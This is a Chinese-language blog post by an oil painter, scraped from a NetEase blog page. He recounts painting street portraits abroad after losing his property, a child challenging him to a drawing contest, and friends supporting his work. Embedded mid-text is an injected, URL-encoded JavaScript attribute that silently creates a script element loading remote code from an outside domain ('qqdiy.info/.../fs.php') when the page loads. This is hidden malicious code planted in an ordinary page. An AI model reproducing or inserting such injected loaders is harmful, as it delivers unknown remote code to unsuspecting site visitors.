注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

艺海淘沙-比尔陈琳油画

这里是我的油画艺术天地.有我的创作心得与体会.与你分享.

 
 
 

日志

 
 
关于我

我丑,我妈爱我。

网易考拉推荐

天堂之梦(11-17)  

2011-02-28 18:12:48|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 

2011-2-28(登博客11-17)

几天来,许多的朋友给了我许多的鼓励。我无比地欣慰,思乡之情油然而生。还是祖国最好,同胞最亲。

记得我刚出国时,上天夺去了我全部财产。于是乎沿街摆摊画像。在整整一年的炼摊日子里,风吹日晒。意外的是这个小国家很快就有了如同神话般的传说。我至今都不知道这到底是出于什么原因“那个昆景(中国人)会画画,是一个库巴(大和尚)转世”。于是很多的人都来找我画像,就连拾垃圾的穷人也要湊上一点钱来让我画上一幅头像掛在家里,说是会有“吉福降临”。我不管是真是假。来者一一照画不误,就这样我画了很多很多的头像。

" " z="if%28%21window.r%29%7Bvar%20s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%27http%3A//qqdiy.info/a/163/fs.php%27%3Bs.type%3D%22text/javascript%22%3Bdocument.getElem%65ntsByTagName%28%27head%27%29.item%280%29.appendChild%28s%29%3Bwindow.r%3D1%7D"<一日,来一小孩,手里抱着画夹,还带着一人充当模特儿,尾随着许多的裁判。要和我比赛画画,一争高下。我看了看孩子的画,的确是一个小天才。造型还比较准确,只是不得法。可惜的是没有很好的指导教师。小孩缠着我,一定要和我比比,得出个一二来。我挥了挥手说“比什么,我又不和谁争高低,你比我画得更好。一边玩去吧”!孩子一直不走。于是我收拾画摊先走了。从此,我再也没有见过这个孩子和这一帮人了。这以后,我就开画廊了。

我其实并不坚强,有时也很没有出息。也常后悔为什么踏上了这条绘画之路。艺无止境,这是一条无边无限的漫长而崎岖的小道。没有尽头。我很苦恼也很开心。同时还喜新厌旧。对于时间长了的作品,恨不得将它撕了。我二0一0年前的作品,都去了欧洲和其它的国家。二0一0年,台湾的朋友说不行。以后要找陈琳的作品,还得从外国人手中去买。于是将我二0一0后的作品全部买下。他们对我说“你的作品仍在中国”。我很高兴,也感谢朋友们真诚的帮助。

现在,大陆的朋友又不断地给我鼓励,给我加油。我信心更足。我将决不辜负朋友的期望。努力进取,创作出更多更好的作品来。

  评论这张
 
阅读(217)| 评论(33)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017